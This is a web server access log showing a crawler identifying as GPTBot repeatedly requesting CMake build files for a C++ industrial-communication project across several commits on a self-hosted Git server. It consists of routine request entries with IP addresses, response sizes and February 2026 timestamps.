200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11651] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11621] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12122] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10209] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10237] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14890] [Gzip 9.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12018] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10644] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11369] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11294] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12078] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr 